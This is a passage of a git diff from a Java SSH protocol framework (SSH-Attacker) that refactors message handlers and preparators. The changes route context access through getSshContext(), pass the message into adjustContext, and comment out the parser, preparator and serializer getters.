{ - super(array); + /* + public GlobalRequestUnknownMessageParser(byte[] array) { + super(array); + } + public GlobalRequestUnknownMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public GlobalRequestUnknownMessageParser(InputStream stream) { + super(stream); } - public GlobalRequestUnknownMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(GlobalRequestUnknownMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ChannelCloseMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ChannelCloseMessagePreparator.java index 7ec3c7f41..6ded5bbc8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ChannelCloseMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ChannelCloseMessagePreparator.java @@ -21,7 +21,10 @@ public ChannelCloseMessagePreparator(Chooser chooser, ChannelCloseMessage messag protected void prepareChannelMessageSpecificContents() { channel.setCloseMessageSent(true); if (!channel.isOpen().getValue()) { - chooser.getContext().getChannels().remove(channel.getLocalChannelId().getValue()); + chooser.getContext() + .getSshContext() + .getChannels() + .remove(channel.getLocalChannelId().getValue()); } } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ChannelMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ChannelMessagePreparator.java index 997cddfda..f00429796 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ChannelMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ChannelMessagePreparator.java @@ -43,12 +43,14 @@ private void prepareChannel() { Optional.ofNullable( this.chooser .getContext() + .getSshContext() .getChannels() .get(senderChannelId))) .or( () -> this.chooser .getContext() + .getSshContext() .getChannelManager() .guessChannelByReceivedMessages()) .orElseGet( @@ -59,6 +61,7 @@ private void prepareChannel() { configSenderChannelId.orElse(Integer.valueOf(0)); return this.chooser .getContext() + .getSshContext() .getChannelManager() .createNewChannelFromDefaults(remoteChannelId); }); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ChannelOpenConfirmationMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ChannelOpenConfirmationMessagePreparator.java index 232aa1733..13291303a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ChannelOpenConfirmationMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ChannelOpenConfirmationMessagePreparator.java @@ -28,13 +28,14 @@ public ChannelOpenConfirmationMessagePreparator( @Override public void prepareMessageSpecificContents() { ChannelOpenConfirmationMessage toCopy = - chooser.getContext().getChannelManager().prepareNextOpenConfirm(); + chooser.getContext().getSshContext().getChannelManager().prepareNextOpenConfirm(); getObject().setRecipientChannelId(toCopy.getRecipientChannelId()); getObject().setSenderChannelId(toCopy.getSenderChannelId()); // get the closed Channel Channel channel = chooser.getContext() + .getSshContext() .getChannelManager() .getChannels() .get(toCopy.getRecipientChannelId().getValue()); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ChannelOpenMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ChannelOpenMessagePreparator.java index f6c41ccb3..1d9fd5229 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ChannelOpenMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ChannelOpenMessagePreparator.java @@ -28,7 +28,7 @@ public ChannelOpenMessagePreparator(Chooser chooser, T message) { @Override public void prepareMessageSpecificContents() { - HashMap channelMap = chooser.getContext().getChannels(); + HashMap channelMap = chooser.getContext().getSshContext().getChannels(); ChannelDefaults channelDefaults = chooser.getConfig().getChannelDefaults(); int channelId; @@ -39,7 +39,10 @@ public void prepareMessageSpecificContents() { } getObject().setSenderChannelId(channelId); Channel channel = - chooser.getContext().getChannels().get(getObject().getSenderChannelId().getValue()); + chooser.getContext() + .getSshContext() + .getChannels() + .get(getObject().getSenderChannelId().getValue()); if (channel != null) { LOGGER.warn( "Channel with id {} is already exists, reusing the existing channel object.", diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/AsciiMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/AsciiMessageHandler.java index 311bf4725..60d4ee917 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/AsciiMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/AsciiMessageHandler.java @@ -9,12 +9,9 @@ import static de.rub.nds.modifiablevariable.util.StringUtil.backslashEscapeString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.message.AsciiMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.AsciiMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.AsciiMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.AsciiMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class AsciiMessageHandler extends ProtocolMessageHandler { @@ -22,17 +19,17 @@ public AsciiMessageHandler(final SshContext context) { super(context); } - public AsciiMessageHandler(final SshContext context, final AsciiMessage message) { + /*public AsciiMessageHandler(final SshContext context, final AsciiMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(AsciiMessage message) { LOGGER.debug( - "Received text message: {}", - backslashEscapeString(this.message.getText().getValue())); + "Received text message: {}", backslashEscapeString(message.getText().getValue())); } + /* @Override public AsciiMessageParser getParser(final byte[] array) { return new AsciiMessageParser(array); @@ -52,4 +49,5 @@ public ProtocolMessagePreparator getPreparator() { public AsciiMessageSerializer getSerializer() { return new AsciiMessageSerializer(message); } + */ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DebugMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DebugMessageHandler.java index d9176a64d..750696849 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DebugMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DebugMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.message.DebugMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.DebugMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.DebugMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.DebugMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.util.Converter; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -25,12 +22,12 @@ public DebugMessageHandler(SshContext context) { super(context); } - public DebugMessageHandler(SshContext context, DebugMessage message) { + /*public DebugMessageHandler(SshContext context, DebugMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(DebugMessage message) { if (Converter.byteToBoolean(message.getAlwaysDisplay().getValue())) { LOGGER.info( "DebugMessage retrieved from remote, message: " @@ -42,7 +39,7 @@ public void adjustContext() { } } - @Override + /*@Override public DebugMessageParser getParser(byte[] array) { return new DebugMessageParser(array); } @@ -60,5 +57,5 @@ public DebugMessagePreparator getPreparator() { @Override public DebugMessageSerializer getSerializer() { return new DebugMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeGroupMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeGroupMessageHandler.java index 7a34976e6..1c4f1c624 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeGroupMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeGroupMessageHandler.java @@ -9,14 +9,9 @@ import de.rub.nds.sshattacker.core.crypto.hash.ExchangeHashInputHolder; import de.rub.nds.sshattacker.core.crypto.kex.DhKeyExchange; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.transport.message.DhGexKeyExchangeGroupMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.DhGexKeyExchangeGroupMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.DhGexKeyExchangeGroupMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.DhGexKeyExchangeGroupMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class DhGexKeyExchangeGroupMessageHandler extends SshMessageHandler { @@ -25,13 +20,13 @@ public DhGexKeyExchangeGroupMessageHandler(SshContext context) { super(context); } - public DhGexKeyExchangeGroupMessageHandler( + /*public DhGexKeyExchangeGroupMessageHandler( SshContext context, DhGexKeyExchangeGroupMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(DhGexKeyExchangeGroupMessage message) { setGroupParametersFromMessage(message); updateExchangeHashWithGroupParameters(message); } @@ -48,7 +43,7 @@ private void updateExchangeHashWithGroupParameters(DhGexKeyExchangeGroupMessage inputHolder.setDhGexGroupGenerator(msg.getGroupGenerator().getValue()); } - @Override + /*@Override public DhGexKeyExchangeGroupMessageParser getParser(byte[] array) { return new DhGexKeyExchangeGroupMessageParser(array); } @@ -66,5 +61,5 @@ public SshMessagePreparator getPreparator() { @Override public SshMessageSerializer getSerializer() { return new DhGexKeyExchangeGroupMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeInitMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeInitMessageHandler.java index aaac17426..5aae6b33a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeInitMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeInitMessageHandler.java @@ -7,13 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.DhGexKeyExchangeInitMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.DhGexKeyExchangeInitMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.DhGexKeyExchangeInitMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.DhGexKeyExchangeInitMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -26,13 +22,13 @@ public DhGexKeyExchangeInitMessageHandler(SshContext context) { super(context); } - public DhGexKeyExchangeInitMessageHandler( + /*public DhGexKeyExchangeInitMessageHandler( SshContext context, DhGexKeyExchangeInitMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(DhGexKeyExchangeInitMessage message) { context.getChooser() .getDhGexKeyExchange() .setRemotePublicKey(message.getEphemeralPublicKey().getValue()); @@ -40,7 +36,7 @@ public void adjustContext() { .setDhGexClientPublicKey(message.getEphemeralPublicKey().getValue()); } - @Override + /*@Override public SshMessageParser getParser(byte[] array) { return new DhGexKeyExchangeInitMessageParser(array); } @@ -59,5 +55,5 @@ public DhGexKeyExchangeInitMessagePreparator getPreparator() { @Override public DhGexKeyExchangeInitMessageSerializer getSerializer() { return new DhGexKeyExchangeInitMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeOldRequestMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeOldRequestMessageHandler.java index 1064532db..5ba53f803 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeOldRequestMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeOldRequestMessageHandler.java @@ -7,13 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.DhGexKeyExchangeOldRequestMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.DhGexKeyExchangeOldRequestMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.DhGexKeyExchangeOldRequestMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.DhGexKeyExchangeOldRequestMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class DhGexKeyExchangeOldRequestMessageHandler extends SshMessageHandler { @@ -22,24 +18,24 @@ public DhGexKeyExchangeOldRequestMessageHandler(SshContext context) { super(context); } - public DhGexKeyExchangeOldRequestMessageHandler( + /*public DhGexKeyExchangeOldRequestMessageHandler( SshContext context, DhGexKeyExchangeOldRequestMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { - updateContextWithPreferredGroupSize(); + public void adjustContext(DhGexKeyExchangeOldRequestMessage message) { + updateContextWithPreferredGroupSize(message); context.setOldGroupRequestReceived(true); } - private void updateContextWithPreferredGroupSize() { + private void updateContextWithPreferredGroupSize(DhGexKeyExchangeOldRequestMessage message) { context.setPreferredDhGroupSize(message.getPreferredGroupSize().getValue()); context.getExchangeHashInputHolder() .setDhGexPreferredGroupSize(message.getPreferredGroupSize().getValue()); } - @Override + /*@Override public SshMessageParser getParser(byte[] array) { return new DhGexKeyExchangeOldRequestMessageParser(array); } @@ -58,5 +54,5 @@ public DhGexKeyExchangeOldRequestMessagePreparator getPreparator() { @Override public DhGexKeyExchangeOldRequestMessageSerializer getSerializer() { return new DhGexKeyExchangeOldRequestMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeReplyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeReplyMessageHandler.java index e5779d108..76e21a881 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeReplyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeReplyMessageHandler.java @@ -7,13 +7,10 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.message.DhGexKeyExchangeReplyMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.DhGexKeyExchangeReplyMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.DhGexKeyExchangeReplyMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.DhGexKeyExchangeReplyMessageSerializer; import de.rub.nds.sshattacker.core.protocol.util.KeyExchangeUtil; -import de.rub.nds.sshattacker.core.state.SshContext; public class DhGexKeyExchangeReplyMessageHandler extends SshMessageHandler { @@ -22,15 +19,15 @@ public DhGexKeyExchangeReplyMessageHandler(SshContext context) { super(context); } - public DhGexKeyExchangeReplyMessageHandler( + /*public DhGexKeyExchangeReplyMessageHandler( SshContext context, DhGexKeyExchangeReplyMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(DhGexKeyExchangeReplyMessage message) { KeyExchangeUtil.handleHostKeyMessage(context, message); - updateContextWithRemotePublicKey(); + updateContextWithRemotePublicKey(message); KeyExchangeUtil.computeSharedSecret(context, context.getChooser().getDhGexKeyExchange()); KeyExchangeUtil.computeExchangeHash(context); KeyExchangeUtil.handleExchangeHashSignatureMessage(context, message); @@ -38,7 +35,7 @@ public void adjustContext() { KeyExchangeUtil.generateKeySet(context); } - private void updateContextWithRemotePublicKey() { + private void updateContextWithRemotePublicKey(DhGexKeyExchangeReplyMessage message) { context.getChooser() .getDhGexKeyExchange() .setRemotePublicKey(message.getEphemeralPublicKey().getValue()); @@ -46,7 +43,7 @@ private void updateContextWithRemotePublicKey() { .setDhGexServerPublicKey(message.getEphemeralPublicKey().getValue()); } - @Override + /*@Override public DhGexKeyExchangeReplyMessageParser getParser(byte[] array) { return new DhGexKeyExchangeReplyMessageParser(array); } @@ -64,5 +61,5 @@ public DhGexKeyExchangeReplyMessagePreparator getPreparator() { @Override public DhGexKeyExchangeReplyMessageSerializer getSerializer() { return new DhGexKeyExchangeReplyMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeRequestMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeRequestMessageHandler.java index d21e8a94c..09708ff03 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeRequestMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeRequestMessageHandler.java @@ -8,13 +8,9 @@ package de.rub.nds.sshattacker.core.protocol.transport.handler; import de.rub.nds.sshattacker.core.crypto.hash.ExchangeHashInputHolder; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.DhGexKeyExchangeRequestMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.DhGexKeyExchangeRequestMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.DhGexKeyExchangeRequestMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.DhGexKeyExchangeRequestMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class DhGexKeyExchangeRequestMessageHandler extends SshMessageHandler { @@ -23,32 +19,32 @@ public DhGexKeyExchangeRequestMessageHandler(SshContext context) { super(context); } - public DhGexKeyExchangeRequestMessageHandler( + /*public DhGexKeyExchangeRequestMessageHandler( SshContext context, DhGexKeyExchangeRequestMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { - updateContextWithAcceptableGroupSize(); - updateExchangeHashWithAcceptableGroupSize(); + public void adjustContext(DhGexKeyExchangeRequestMessage message) { + updateContextWithAcceptableGroupSize(message); + updateExchangeHashWithAcceptableGroupSize(message); context.setOldGroupRequestReceived(false); } - private void updateContextWithAcceptableGroupSize() { + private void updateContextWithAcceptableGroupSize(DhGexKeyExchangeRequestMessage message) { context.setMinimalDhGroupSize(message.getMinimalGroupSize().getValue()); context.setPreferredDhGroupSize(message.getPreferredGroupSize().getValue()); context.setMaximalDhGroupSize(message.getMaximalGroupSize().getValue()); } - private void updateExchangeHashWithAcceptableGroupSize() { + private void updateExchangeHashWithAcceptableGroupSize(DhGexKeyExchangeRequestMessage message) { ExchangeHashInputHolder inputHolder = context.getExchangeHashInputHolder(); inputHolder.setDhGexMinimalGroupSize(message.getMinimalGroupSize().getValue()); inputHolder.setDhGexPreferredGroupSize(message.getPreferredGroupSize().getValue()); inputHolder.setDhGexMaximalGroupSize(message.getMaximalGroupSize().getValue()); } - @Override + /*@Override public SshMessageParser getParser(byte[] array) { return new DhGexKeyExchangeRequestMessageParser(array); } @@ -67,5 +63,5 @@ public DhGexKeyExchangeRequestMessagePreparator getPreparator() { @Override public DhGexKeyExchangeRequestMessageSerializer getSerializer() { return new DhGexKeyExchangeRequestMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhKeyExchangeInitMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhKeyExchangeInitMessageHandler.java index 9617a06cf..3d65e5586 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhKeyExchangeInitMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhKeyExchangeInitMessageHandler.java @@ -7,13 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.DhKeyExchangeInitMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.DhKeyExchangeInitMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.DhKeyExchangeInitMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.DhKeyExchangeInitMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -25,12 +21,12 @@ public DhKeyExchangeInitMessageHandler(SshContext context) { super(context); } - public DhKeyExchangeInitMessageHandler(SshContext context, DhKeyExchangeInitMessage message) { + /*public DhKeyExchangeInitMessageHandler(SshContext context, DhKeyExchangeInitMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(DhKeyExchangeInitMessage message) { context.getChooser() .getDhKeyExchange() .setRemotePublicKey(message.getEphemeralPublicKey().getValue()); @@ -38,7 +34,7 @@ public void adjustContext() { .setDhClientPublicKey(message.getEphemeralPublicKey().getValue()); } - @Override + /*@Override public SshMessageParser getParser(byte[] array) { return new DhKeyExchangeInitMessageParser(array); } @@ -56,5 +52,5 @@ public DhKeyExchangeInitMessagePreparator getPreparator() { @Override public DhKeyExchangeInitMessageSerializer getSerializer() { return new DhKeyExchangeInitMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhKeyExchangeReplyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhKeyExchangeReplyMessageHandler.java index bc080abef..be0a9b9e8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhKeyExchangeReplyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhKeyExchangeReplyMessageHandler.java @@ -7,13 +7,10 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.message.DhKeyExchangeReplyMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.DhKeyExchangeReplyMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.DhKeyExchangeReplyMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.DhKeyExchangeReplyMessageSerializer; import de.rub.nds.sshattacker.core.protocol.util.KeyExchangeUtil; -import de.rub.nds.sshattacker.core.state.SshContext; public class DhKeyExchangeReplyMessageHandler extends SshMessageHandler { @@ -21,12 +18,12 @@ public DhKeyExchangeReplyMessageHandler(SshContext context) { super(context); } - public DhKeyExchangeReplyMessageHandler(SshContext context, DhKeyExchangeReplyMessage message) { + /*public DhKeyExchangeReplyMessageHandler(SshContext context, DhKeyExchangeReplyMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(DhKeyExchangeReplyMessage message) { KeyExchangeUtil.handleHostKeyMessage(context, message); updateContextWithRemotePublicKey(message); KeyExchangeUtil.computeSharedSecret(context, context.getChooser().getDhKeyExchange()); @@ -44,7 +41,7 @@ private void updateContextWithRemotePublicKey(DhKeyExchangeReplyMessage message) .setDhServerPublicKey(message.getEphemeralPublicKey().getValue()); } - @Override + /*@Override public DhKeyExchangeReplyMessageParser getParser(byte[] array) { return new DhKeyExchangeReplyMessageParser(array); } @@ -62,5 +59,5 @@ public SshMessagePreparator getPreparator() { @Override public SshMessageSerializer getSerializer() { return new DhKeyExchangeReplyMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DisconnectMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DisconnectMessageHandler.java index 84cb39f0a..03936b60a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DisconnectMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DisconnectMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.message.DisconnectMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.DisconnectMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.DisconnectMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.DisconnectMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -24,17 +21,17 @@ public DisconnectMessageHandler(SshContext context) { super(context); } - public DisconnectMessageHandler(SshContext context, DisconnectMessage message) { + /*public DisconnectMessageHandler(SshContext context, DisconnectMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(DisconnectMessage message) { LOGGER.info("Received DisconnectMessage"); context.setDisconnectMessageReceived(true); } - @Override + /*@Override public DisconnectMessageParser getParser(byte[] array) { return new DisconnectMessageParser(array); } @@ -52,5 +49,5 @@ public DisconnectMessagePreparator getPreparator() { @Override public DisconnectMessageSerializer getSerializer() { return new DisconnectMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/EcdhKeyExchangeInitMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/EcdhKeyExchangeInitMessageHandler.java index d1e93fc8b..e8dee5c7f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/EcdhKeyExchangeInitMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/EcdhKeyExchangeInitMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.transport.message.EcdhKeyExchangeInitMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.EcdhKeyExchangeInitMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.EcdhKeyExchangeInitMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.EcdhKeyExchangeInitMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -25,13 +22,13 @@ public EcdhKeyExchangeInitMessageHandler(SshContext context) { super(context); } - public EcdhKeyExchangeInitMessageHandler( + /*public EcdhKeyExchangeInitMessageHandler( SshContext context, EcdhKeyExchangeInitMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(EcdhKeyExchangeInitMessage message) { context.getChooser() .getEcdhKeyExchange() .setRemotePublicKey(message.getEphemeralPublicKey().getValue()); @@ -39,7 +36,7 @@ public void adjustContext() { .setEcdhClientPublicKey(message.getEphemeralPublicKey().getValue()); } - @Override + /*@Override public EcdhKeyExchangeInitMessageParser getParser(byte[] array) { return new EcdhKeyExchangeInitMessageParser(array); } @@ -57,5 +54,5 @@ public EcdhKeyExchangeInitMessagePreparator getPreparator() { @Override public EcdhKeyExchangeInitMessageSerializer getSerializer() { return new EcdhKeyExchangeInitMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/EcdhKeyExchangeReplyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/EcdhKeyExchangeReplyMessageHandler.java index d0e214f15..9c60b1690 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/EcdhKeyExchangeReplyMessageHandler.java +++ 